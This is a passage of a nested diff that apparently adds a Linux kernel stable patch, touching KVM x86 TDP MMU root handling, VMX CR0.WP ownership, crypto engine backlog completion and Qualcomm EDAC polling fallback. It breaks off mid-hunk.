+ 	 * write and in the same critical section as making the reload request,
+ 	 * e.g. before kvm_zap_obsolete_pages() could drop mmu_lock and yield.
+ 	 */
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_invalidate_all_roots(kvm);
+ 
+ 	/*
+@@ -5991,7 +6025,7 @@ static void kvm_mmu_zap_all_fast(struct kvm *kvm)
+ 	 * Deferring the zap until the final reference to the root is put would
+ 	 * lead to use-after-free.
+ 	 */
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_zap_invalidated_roots(kvm);
+ }
+ 
+@@ -6017,9 +6051,11 @@ int kvm_mmu_init_vm(struct kvm *kvm)
+ 	INIT_LIST_HEAD(&kvm->arch.possible_nx_huge_pages);
+ 	spin_lock_init(&kvm->arch.mmu_unsync_pages_lock);
+ 
+-	r = kvm_mmu_init_tdp_mmu(kvm);
+-	if (r < 0)
+-		return r;
++	if (tdp_mmu_enabled) {
++		r = kvm_mmu_init_tdp_mmu(kvm);
++		if (r < 0)
++			return r;
++	}
+ 
+ 	node->track_write = kvm_mmu_pte_write;
+ 	node->track_flush_slot = kvm_mmu_invalidate_zap_pages_in_memslot;
+@@ -6049,7 +6085,8 @@ void kvm_mmu_uninit_vm(struct kvm *kvm)
+ 
+ 	kvm_page_track_unregister_notifier(kvm, node);
+ 
+-	kvm_mmu_uninit_tdp_mmu(kvm);
++	if (tdp_mmu_enabled)
++		kvm_mmu_uninit_tdp_mmu(kvm);
+ 
+ 	mmu_free_vm_memory_caches(kvm);
+ }
+@@ -6103,7 +6140,7 @@ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ 
+ 	flush = kvm_rmap_zap_gfn_range(kvm, gfn_start, gfn_end);
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++)
+ 			flush = kvm_tdp_mmu_zap_leafs(kvm, i, gfn_start,
+ 						      gfn_end, true, flush);
+@@ -6136,7 +6173,7 @@ void kvm_mmu_slot_remove_write_access(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_wrprot_slot(kvm, memslot, start_level);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6379,7 +6416,7 @@ void kvm_mmu_try_split_huge_pages(struct kvm *kvm,
+ 				   u64 start, u64 end,
+ 				   int target_level)
+ {
+-	if (!is_tdp_mmu_enabled(kvm))
++	if (!tdp_mmu_enabled)
+ 		return;
+ 
+ 	if (kvm_memslots_have_rmaps(kvm))
+@@ -6400,7 +6437,7 @@ void kvm_mmu_slot_try_split_huge_pages(struct kvm *kvm,
+ 	u64 start = memslot->base_gfn;
+ 	u64 end = start + memslot->npages;
+ 
+-	if (!is_tdp_mmu_enabled(kvm))
++	if (!tdp_mmu_enabled)
+ 		return;
+ 
+ 	if (kvm_memslots_have_rmaps(kvm)) {
+@@ -6483,7 +6520,7 @@ void kvm_mmu_zap_collapsible_sptes(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_zap_collapsible_sptes(kvm, slot);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6518,7 +6555,7 @@ void kvm_mmu_slot_leaf_clear_dirty(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_clear_dirty_slot(kvm, memslot);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6553,7 +6590,7 @@ restart:
+ 
+ 	kvm_mmu_commit_zap_page(kvm, &invalid_list);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_zap_all(kvm);
+ 
+ 	write_unlock(&kvm->mmu_lock);
+@@ -6718,6 +6755,13 @@ void __init kvm_mmu_x86_module_init(void)
+ 	if (nx_huge_pages == -1)
+ 		__set_nx_huge_pages(get_nx_auto_mode());
+ 
++	/*
++	 * Snapshot userspace's desire to enable the TDP MMU. Whether or not the
++	 * TDP MMU is actually enabled is determined in kvm_configure_mmu()
++	 * when the vendor module is loaded.
++	 */
++	tdp_mmu_allowed = tdp_mmu_enabled;
++
+ 	kvm_mmu_spte_module_init();
+ }
+ 
+diff --git a/arch/x86/kvm/mmu/paging_tmpl.h b/arch/x86/kvm/mmu/paging_tmpl.h
+index 0f64550720557..89b19b7ef4f9f 100644
+--- a/arch/x86/kvm/mmu/paging_tmpl.h
++++ b/arch/x86/kvm/mmu/paging_tmpl.h
+@@ -324,7 +324,7 @@ static int FNAME(walk_addr_generic)(struct guest_walker *walker,
+ 	trace_kvm_mmu_pagetable_walk(addr, access);
+ retry_walk:
+ 	walker->level = mmu->cpu_role.base.level;
+-	pte           = mmu->get_guest_pgd(vcpu);
++	pte           = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	have_ad       = PT_HAVE_ACCESSED_DIRTY(mmu);
+ 
+ #if PTTYPE == 64
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index d6df38d371a00..c649a333792b8 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -10,23 +10,15 @@
+ #include <asm/cmpxchg.h>
+ #include <trace/events/kvm.h>
+ 
+-static bool __read_mostly tdp_mmu_enabled = true;
+-module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0644);
+-
+ /* Initializes the TDP MMU for the VM, if enabled. */
+ int kvm_mmu_init_tdp_mmu(struct kvm *kvm)
+ {
+ 	struct workqueue_struct *wq;
+ 
+-	if (!tdp_enabled || !READ_ONCE(tdp_mmu_enabled))
+-		return 0;
+-
+ 	wq = alloc_workqueue("kvm", WQ_UNBOUND|WQ_MEM_RECLAIM|WQ_CPU_INTENSIVE, 0);
+ 	if (!wq)
+ 		return -ENOMEM;
+ 
+-	/* This should not be changed for the lifetime of the VM. */
+-	kvm->arch.tdp_mmu_enabled = true;
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_roots);
+ 	spin_lock_init(&kvm->arch.tdp_mmu_pages_lock);
+ 	kvm->arch.tdp_mmu_zap_wq = wq;
+@@ -47,10 +39,17 @@ static __always_inline bool kvm_lockdep_assert_mmu_lock_held(struct kvm *kvm,
+ 
+ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ {
+-	if (!kvm->arch.tdp_mmu_enabled)
+-		return;
++	/*
++	 * Invalidate all roots, which besides the obvious, schedules all roots
++	 * for zapping and thus puts the TDP MMU's reference to each root, i.e.
++	 * ultimately frees all roots.
++	 */
++	kvm_tdp_mmu_invalidate_all_roots(kvm);
+ 
+-	/* Also waits for any queued work items.  */
++	/*
++	 * Destroying a workqueue also first flushes the workqueue, i.e. no
++	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
++	 */
+ 	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
+ 
+ 	WARN_ON(atomic64_read(&kvm->arch.tdp_mmu_pages));
+@@ -126,16 +125,6 @@ static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root
+ 	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+ }
+ 
+-static inline bool kvm_tdp_root_mark_invalid(struct kvm_mmu_page *page)
+-{
+-	union kvm_mmu_page_role role = page->role;
+-	role.invalid = true;
+-
+-	/* No need to use cmpxchg, only the invalid bit can change.  */
+-	role.word = xchg(&page->role.word, role.word);
+-	return role.invalid;
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -144,45 +133,12 @@ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 	if (!refcount_dec_and_test(&root->tdp_mmu_root_count))
+ 		return;
+ 
+-	WARN_ON(!root->tdp_mmu_page);
+-
+ 	/*
+-	 * The root now has refcount=0.  It is valid, but readers already
+-	 * cannot acquire a reference to it because kvm_tdp_mmu_get_root()
+-	 * rejects it.  This remains true for the rest of the execution
+-	 * of this function, because readers visit valid roots only
+-	 * (except for tdp_mmu_zap_root_work(), which however
+-	 * does not acquire any reference itself).
+-	 *
+-	 * Even though there are flows that need to visit all roots for
+-	 * correctness, they all take mmu_lock for write, so they cannot yet
+-	 * run concurrently. The same is true after kvm_tdp_root_mark_invalid,
+-	 * since the root still has refcount=0.
+-	 *
+-	 * However, tdp_mmu_zap_root can yield, and writers do not expect to
+-	 * see refcount=0 (see for example kvm_tdp_mmu_invalidate_all_roots()).
+-	 * So the root temporarily gets an extra reference, going to refcount=1
+-	 * while staying invalid.  Readers still cannot acquire any reference;
+-	 * but writers are now allowed to run if tdp_mmu_zap_root yields and
+-	 * they might take an extra reference if they themselves yield.
+-	 * Therefore, when the reference is given back by the worker,
+-	 * there is no guarantee that the refcount is still 1.  If not, whoever
+-	 * puts the last reference will free the page, but they will not have to
+-	 * zap the root because a root cannot go from invalid to valid.
++	 * The TDP MMU itself holds a reference to each root until the root is
++	 * explicitly invalidated, i.e. the final reference should be never be
++	 * put for a valid root.
+ 	 */
+-	if (!kvm_tdp_root_mark_invalid(root)) {
+-		refcount_set(&root->tdp_mmu_root_count, 1);
+-
+-		/*
+-		 * Zapping the root in a worker is not just "nice to have";
+-		 * it is required because kvm_tdp_mmu_invalidate_all_roots()
+-		 * skips already-invalid roots.  If kvm_tdp_mmu_put_root() did
+-		 * not add the root to the workqueue, kvm_tdp_mmu_zap_all_fast()
+-		 * might return with some roots not zapped yet.
+-		 */
+-		tdp_mmu_schedule_zap_root(kvm, root);
+-		return;
+-	}
++	KVM_BUG_ON(!is_tdp_mmu_page(root) || !root->role.invalid, kvm);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_del_rcu(&root->link);
+@@ -330,7 +286,14 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	root = tdp_mmu_alloc_sp(vcpu);
+ 	tdp_mmu_init_sp(root, NULL, 0, role);
+ 
+-	refcount_set(&root->tdp_mmu_root_count, 1);
++	/*
++	 * TDP MMU roots are kept until they are explicitly invalidated, either
++	 * by a memslot update or by the destruction of the VM.  Initialize the
++	 * refcount to two; one reference for the vCPU, and one reference for
++	 * the TDP MMU itself, which is held until the root is invalidated and
++	 * is ultimately put by tdp_mmu_zap_root_work().
++	 */
++	refcount_set(&root->tdp_mmu_root_count, 2);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_add_rcu(&root->link, &kvm->arch.tdp_mmu_roots);
+@@ -1033,32 +996,49 @@ void kvm_tdp_mmu_zap_invalidated_roots(struct kvm *kvm)
+ /*
+  * Mark each TDP MMU root as invalid to prevent vCPUs from reusing a root that
+  * is about to be zapped, e.g. in response to a memslots update.  The actual
+- * zapping is performed asynchronously, so a reference is taken on all roots.
+- * Using a separate workqueue makes it easy to ensure that the destruction is
+- * performed before the "fast zap" completes, without keeping a separate list
+- * of invalidated roots; the list is effectively the list of work items in
+- * the workqueue.
+- *
+- * Get a reference even if the root is already invalid, the asynchronous worker
+- * assumes it was gifted a reference to the root it processes.  Because mmu_lock
+- * is held for write, it should be impossible to observe a root with zero refcount,
+- * i.e. the list of roots cannot be stale.
++ * zapping is performed asynchronously.  Using a separate workqueue makes it
++ * easy to ensure that the destruction is performed before the "fast zap"
++ * completes, without keeping a separate list of invalidated roots; the list is
++ * effectively the list of work items in the workqueue.
+  *
+- * This has essentially the same effect for the TDP MMU
+- * as updating mmu_valid_gen does for the shadow MMU.
++ * Note, the asynchronous worker is gifted the TDP MMU's reference.
++ * See kvm_tdp_mmu_get_vcpu_root_hpa().
+  */
+ void kvm_tdp_mmu_invalidate_all_roots(struct kvm *kvm)
+ {
+ 	struct kvm_mmu_page *root;
+ 
+-	lockdep_assert_held_write(&kvm->mmu_lock);
+-	list_for_each_entry(root, &kvm->arch.tdp_mmu_roots, link) {
+-		if (!root->role.invalid &&
+-		    !WARN_ON_ONCE(!kvm_tdp_mmu_get_root(root))) {
++	/*
++	 * mmu_lock must be held for write to ensure that a root doesn't become
++	 * invalid while there are active readers (invalidating a root while
++	 * there are active readers may or may not be problematic in practice,
++	 * but it's uncharted territory and not supported).
++	 *
++	 * Waive the assertion if there are no users of @kvm, i.e. the VM is
++	 * being destroyed after all references have been put, or if no vCPUs
++	 * have been created (which means there are no roots), i.e. the VM is
++	 * being destroyed in an error path of KVM_CREATE_VM.
++	 */
++	if (IS_ENABLED(CONFIG_PROVE_LOCKING) &&
++	    refcount_read(&kvm->users_count) && kvm->created_vcpus)
++		lockdep_assert_held_write(&kvm->mmu_lock);
++
++	/*
++	 * As above, mmu_lock isn't held when destroying the VM!  There can't
++	 * be other references to @kvm, i.e. nothing else can invalidate roots
++	 * or be consuming roots, but walking the list of roots does need to be
++	 * guarded against roots being deleted by the asynchronous zap worker.
++	 */
++	rcu_read_lock();
++
++	list_for_each_entry_rcu(root, &kvm->arch.tdp_mmu_roots, link) {
++		if (!root->role.invalid) {
+ 			root->role.invalid = true;
+ 			tdp_mmu_schedule_zap_root(kvm, root);
+ 		}
+ 	}
++
++	rcu_read_unlock();
+ }
+ 
+ /*
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.h b/arch/x86/kvm/mmu/tdp_mmu.h
+index d3714200b932a..e4ab2dac269d6 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.h
++++ b/arch/x86/kvm/mmu/tdp_mmu.h
+@@ -7,6 +7,9 @@
+ 
+ #include "spte.h"
+ 
++int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
++void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
++
+ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu);
+ 
+ __must_check static inline bool kvm_tdp_mmu_get_root(struct kvm_mmu_page *root)
+@@ -68,8 +71,6 @@ u64 *kvm_tdp_mmu_fast_pf_get_last_sptep(struct kvm_vcpu *vcpu, u64 addr,
+ 					u64 *spte);
+ 
+ #ifdef CONFIG_X86_64
+-int kvm_mmu_init_tdp_mmu(struct kvm *kvm);
+-void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm);
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return sp->tdp_mmu_page; }
+ 
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+@@ -89,8 +90,6 @@ static inline bool is_tdp_mmu(struct kvm_mmu *mmu)
+ 	return sp && is_tdp_mmu_page(sp) && sp->root_count;
+ }
+ #else
+-static inline int kvm_mmu_init_tdp_mmu(struct kvm *kvm) { return 0; }
+-static inline void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm) {}
+ static inline bool is_tdp_mmu_page(struct kvm_mmu_page *sp) { return false; }
+ static inline bool is_tdp_mmu(struct kvm_mmu *mmu) { return false; }
+ #endif
+diff --git a/arch/x86/kvm/pmu.c b/arch/x86/kvm/pmu.c
+index eb594620dd75a..8be583a05de70 100644
+--- a/arch/x86/kvm/pmu.c
++++ b/arch/x86/kvm/pmu.c
+@@ -438,9 +438,9 @@ int kvm_pmu_rdpmc(struct kvm_vcpu *vcpu, unsigned idx, u64 *data)
+ 	if (!pmc)
+ 		return 1;
+ 
+-	if (!(kvm_read_cr4(vcpu) & X86_CR4_PCE) &&
++	if (!(kvm_read_cr4_bits(vcpu, X86_CR4_PCE)) &&
+ 	    (static_call(kvm_x86_get_cpl)(vcpu) != 0) &&
+-	    (kvm_read_cr0(vcpu) & X86_CR0_PE))
++	    (kvm_read_cr0_bits(vcpu, X86_CR0_PE)))
+ 		return 1;
+ 
+ 	*data = pmc_read_counter(pmc) & mask;
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index b7f2e59d50ee4..579ceaf75dde7 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -4488,7 +4488,7 @@ static void load_vmcs12_host_state(struct kvm_vcpu *vcpu,
+ 	 * CR0_GUEST_HOST_MASK is already set in the original vmcs01
+ 	 * (KVM doesn't change it);
+ 	 */
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs12->host_cr0);
+ 
+ 	/* Same as above - no reason to call set_cr4_guest_host_mask().  */
+@@ -4639,7 +4639,7 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
+ 	 */
+ 	vmx_set_efer(vcpu, nested_vmx_get_vmcs01_guest_efer(vmx));
+ 
+-	vcpu->arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vcpu->arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmx_set_cr0(vcpu, vmcs_readl(CR0_READ_SHADOW));
+ 
+ 	vcpu->arch.cr4_guest_owned_bits = ~vmcs_readl(CR4_GUEST_HOST_MASK);
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 53034045cb6e6..57a73954980ac 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -4728,7 +4728,7 @@ static void init_vmcs(struct vcpu_vmx *vmx)
+ 	/* 22.2.1, 20.8.1 */
+ 	vm_entry_controls_set(vmx, vmx_vmentry_ctrl());
+ 
+-	vmx->vcpu.arch.cr0_guest_owned_bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++	vmx->vcpu.arch.cr0_guest_owned_bits = vmx_l1_guest_owned_cr0_bits();
+ 	vmcs_writel(CR0_GUEST_HOST_MASK, ~vmx->vcpu.arch.cr0_guest_owned_bits);
+ 
+ 	set_cr4_guest_host_mask(vmx);
+@@ -5450,7 +5450,7 @@ static int handle_cr(struct kvm_vcpu *vcpu)
+ 		break;
+ 	case 3: /* lmsw */
+ 		val = (exit_qualification >> LMSW_SOURCE_DATA_SHIFT) & 0x0f;
+-		trace_kvm_cr_write(0, (kvm_read_cr0(vcpu) & ~0xful) | val);
++		trace_kvm_cr_write(0, (kvm_read_cr0_bits(vcpu, ~0xful) | val));
+ 		kvm_lmsw(vcpu, val);
+ 
+ 		return kvm_skip_emulated_instruction(vcpu);
+@@ -7531,7 +7531,7 @@ static u8 vmx_get_mt_mask(struct kvm_vcpu *vcpu, gfn_t gfn, bool is_mmio)
+ 	if (!kvm_arch_has_noncoherent_dma(vcpu->kvm))
+ 		return (MTRR_TYPE_WRBACK << VMX_EPT_MT_EPTE_SHIFT) | VMX_EPT_IPAT_BIT;
+ 
+-	if (kvm_read_cr0(vcpu) & X86_CR0_CD) {
++	if (kvm_read_cr0_bits(vcpu, X86_CR0_CD)) {
+ 		if (kvm_check_has_quirk(vcpu->kvm, KVM_X86_QUIRK_CD_NW_CLEARED))
+ 			cache = MTRR_TYPE_WRBACK;
+ 		else
+diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
+index a3da84f4ea456..e2b04f4c0fef3 100644
+--- a/arch/x86/kvm/vmx/vmx.h
++++ b/arch/x86/kvm/vmx/vmx.h
+@@ -640,6 +640,24 @@ BUILD_CONTROLS_SHADOW(tertiary_exec, TERTIARY_VM_EXEC_CONTROL, 64)
+ 				(1 << VCPU_EXREG_EXIT_INFO_1) | \
+ 				(1 << VCPU_EXREG_EXIT_INFO_2))
+ 
++static inline unsigned long vmx_l1_guest_owned_cr0_bits(void)
++{
++	unsigned long bits = KVM_POSSIBLE_CR0_GUEST_BITS;
++
++	/*
++	 * CR0.WP needs to be intercepted when KVM is shadowing legacy paging
++	 * in order to construct shadow PTEs with the correct protections.
++	 * Note!  CR0.WP technically can be passed through to the guest if
++	 * paging is disabled, but checking CR0.PG would generate a cyclical
++	 * dependency of sorts due to forcing the caller to ensure CR0 holds
++	 * the correct value prior to determining which CR0 bits can be owned
++	 * by L1.  Keep it simple and limit the optimization to EPT.
++	 */
++	if (!enable_ept)
++		bits &= ~X86_CR0_WP;
++	return bits;
++}
++
+ static inline struct kvm_vmx *to_kvm_vmx(struct kvm *kvm)
+ {
+ 	return container_of(kvm, struct kvm_vmx, kvm);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 2d76c254582b0..35cd87a326ace 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -904,6 +904,18 @@ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
++	/*
++	 * CR0.WP is incorporated into the MMU role, but only for non-nested,
++	 * indirect shadow MMUs.  If TDP is enabled, the MMU's metadata needs
++	 * to be updated, e.g. so that emulating guest translations does the
++	 * right thing, but there's no need to unload the root as CR0.WP
++	 * doesn't affect SPTEs.
++	 */
++	if (tdp_enabled && (cr0 ^ old_cr0) == X86_CR0_WP) {
++		kvm_init_mmu(vcpu);
++		return;
++	}
++
+ 	if ((cr0 ^ old_cr0) & X86_CR0_PG) {
+ 		kvm_clear_async_pf_completion_queue(vcpu);
+ 		kvm_async_pf_hash_reset(vcpu);
+diff --git a/arch/x86/lib/clear_page_64.S b/arch/x86/lib/clear_page_64.S
+index ecbfb4dd3b019..faa4cdc747a3e 100644
+--- a/arch/x86/lib/clear_page_64.S
++++ b/arch/x86/lib/clear_page_64.S
+@@ -142,8 +142,8 @@ SYM_FUNC_START(clear_user_rep_good)
+ 	and $7, %edx
+ 	jz .Lrep_good_exit
+ 
+-.Lrep_good_bytes:
+ 	mov %edx, %ecx
++.Lrep_good_bytes:
+ 	rep stosb
+ 
+ .Lrep_good_exit:
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 5f61c65322bea..22fc313c65004 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -144,8 +144,8 @@ SYM_CODE_END(__x86_indirect_jump_thunk_array)
+  */
+ 	.align 64
+ 	.skip 63, 0xcc
+-SYM_FUNC_START_NOALIGN(zen_untrain_ret);
+-
++SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_NOENDBR
+ 	/*
+ 	 * As executed from zen_untrain_ret, this is:
+ 	 *
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 9ac1efb053e08..2d8a28e4e22f7 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -501,6 +501,9 @@ restart:
+ 	list_for_each_entry_safe(blkg, n, &q->blkg_list, q_node) {
+ 		struct blkcg *blkcg = blkg->blkcg;
+ 
++		if (hlist_unhashed(&blkg->blkcg_node))
++			continue;
++
+ 		spin_lock(&blkcg->lock);
+ 		blkg_destroy(blkg);
+ 		spin_unlock(&blkcg->lock);
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 9de0677b3643d..60b98d2c400e3 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -963,6 +963,9 @@ EXPORT_SYMBOL_GPL(crypto_enqueue_request);
+ void crypto_enqueue_request_head(struct crypto_queue *queue,
+ 				 struct crypto_async_request *request)
+ {
++	if (unlikely(queue->qlen >= queue->max_qlen))
++		queue->backlog = queue->backlog->prev;
++
+ 	queue->qlen++;
+ 	list_add(&request->list, &queue->list);
+ }
+diff --git a/crypto/crypto_engine.c b/crypto/crypto_engine.c
+index bb8e77077f020..50bac2ab55f17 100644
+--- a/crypto/crypto_engine.c
++++ b/crypto/crypto_engine.c
+@@ -54,7 +54,7 @@ static void crypto_finalize_request(struct crypto_engine *engine,
+ 		}
+ 	}
+ 	lockdep_assert_in_softirq();
+-	req->complete(req, err);
++	crypto_request_complete(req, err);
+ 
+ 	kthread_queue_work(engine->kworker, &engine->pump_requests);
+ }
+@@ -129,9 +129,6 @@ start_request:
+ 	if (!engine->retry_support)
+ 		engine->cur_req = async_req;
+ 
+-	if (backlog)
+-		backlog->complete(backlog, -EINPROGRESS);
+-
+ 	if (engine->busy)
+ 		was_busy = true;
+ 	else
+@@ -214,9 +211,12 @@ req_err_1:
+ 	}
+ 
+ req_err_2:
+-	async_req->complete(async_req, ret);
++	crypto_request_complete(async_req, ret);
+ 
+ retry:
++	if (backlog)
++		crypto_request_complete(backlog, -EINPROGRESS);
++
+ 	/* If retry mechanism is supported, send new requests to engine */
+ 	if (engine->retry_support) {
+ 		spin_lock_irqsave(&engine->queue_lock, flags);
+diff --git a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+index 902f6be057ec6..e97fb203690ae 100644
+--- a/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
++++ b/drivers/crypto/allwinner/sun8i-ss/sun8i-ss-cipher.c
+@@ -151,7 +151,7 @@ static int sun8i_ss_setup_ivs(struct skcipher_request *areq)
+ 		}
+ 		rctx->p_iv[i] = a;
+ 		/* we need to setup all others IVs only in the decrypt way */
+-		if (rctx->op_dir & SS_ENCRYPTION)
++		if (rctx->op_dir == SS_ENCRYPTION)
+ 			return 0;
+ 		todo = min(len, sg_dma_len(sg));
+ 		len -= todo;
+diff --git a/drivers/crypto/ccp/psp-dev.c b/drivers/crypto/ccp/psp-dev.c
+index c9c741ac84421..949a3fa0b94a9 100644
+--- a/drivers/crypto/ccp/psp-dev.c
++++ b/drivers/crypto/ccp/psp-dev.c
+@@ -42,6 +42,9 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 	/* Read the interrupt status: */
+ 	status = ioread32(psp->io_regs + psp->vdata->intsts_reg);
+ 
++	/* Clear the interrupt status by writing the same value we read. */
++	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
++
+ 	/* invoke subdevice interrupt handlers */
+ 	if (status) {
+ 		if (psp->sev_irq_handler)
+@@ -51,9 +54,6 @@ static irqreturn_t psp_irq_handler(int irq, void *data)
+ 			psp->tee_irq_handler(irq, psp->tee_irq_data, status);
+ 	}
+ 
+-	/* Clear the interrupt status by writing the same value we read. */
+-	iowrite32(status, psp->io_regs + psp->vdata->intsts_reg);
+-
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/edac/qcom_edac.c b/drivers/edac/qcom_edac.c
+index c45519f59dc11..2c91ceff8a9ca 100644
+--- a/drivers/edac/qcom_edac.c
++++ b/drivers/edac/qcom_edac.c
+@@ -76,6 +76,8 @@
+ #define DRP0_INTERRUPT_ENABLE           BIT(6)
+ #define SB_DB_DRP_INTERRUPT_ENABLE      0x3
+ 
++#define ECC_POLL_MSEC			5000
++
+ enum {
+ 	LLCC_DRAM_CE = 0,
+ 	LLCC_DRAM_UE,
+@@ -285,8 +287,7 @@ dump_syn_reg(struct edac_device_ctl_info *edev_ctl, int err_type, u32 bank)
+ 	return ret;
+ }
+ 
+-static irqreturn_t
+-llcc_ecc_irq_handler(int irq, void *edev_ctl)
++static irqreturn_t llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ {
+ 	struct edac_device_ctl_info *edac_dev_ctl = edev_ctl;
+ 	struct llcc_drv_data *drv = edac_dev_ctl->dev->platform_data;
+@@ -332,6 +333,11 @@ llcc_ecc_irq_handler(int irq, void *edev_ctl)
+ 	return irq_rc;
+ }
+ 
++static void llcc_ecc_check(struct edac_device_ctl_info *edev_ctl)
++{
++	llcc_ecc_irq_handler(0, edev_ctl);
++}
++
+ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ {
+ 	struct llcc_drv_data *llcc_driv_data = pdev->dev.platform_data;
+@@ -359,29 +365,31 @@ static int qcom_llcc_edac_probe(struct platform_device *pdev)
+ 	edev_ctl->ctl_name = "llcc";
+ 	edev_ctl->panic_on_ue = LLCC_ERP_PANIC_ON_UE;
+ 
+-	rc = edac_device_add_device(edev_ctl);
+-	if (rc)
+-		goto out_mem;
+-
+-	platform_set_drvdata(pdev, edev_ctl);
+-
+-	/* Request for ecc irq */
++	/* Check if LLCC driver has passed ECC IRQ */
+ 	ecc_irq = llcc_driv_data->ecc_irq;
+-	if (ecc_irq < 0) {
+-		rc = -ENODEV;
+-		goto out_dev;
+-	}
+-	rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
++	if (ecc_irq > 0) {
++		/* Use interrupt mode if IRQ is available */
++		rc = devm_request_irq(dev, ecc_irq, llcc_ecc_irq_handler,
+ 			      IRQF_TRIGGER_HIGH, "llcc_ecc", edev_ctl);
+-	if (rc)
+-		goto out_dev;
++		if (!rc) {
++			edac_op_state = EDAC_OPSTATE_INT;
++			goto irq_done;
++		}
++	}
+ 
+-	return rc;
++	/* Fall back to polling mode otherwise */
++	edev_ctl->poll_msec = ECC_POLL_MSEC;
++	edev_ctl->edac_check = llcc_ecc_check;
++	edac_op_state = EDAC_OPSTATE_POLL;
+ 
+-out_dev:
+-	edac_device_del_device(edev_ctl->dev);
+-out_mem:
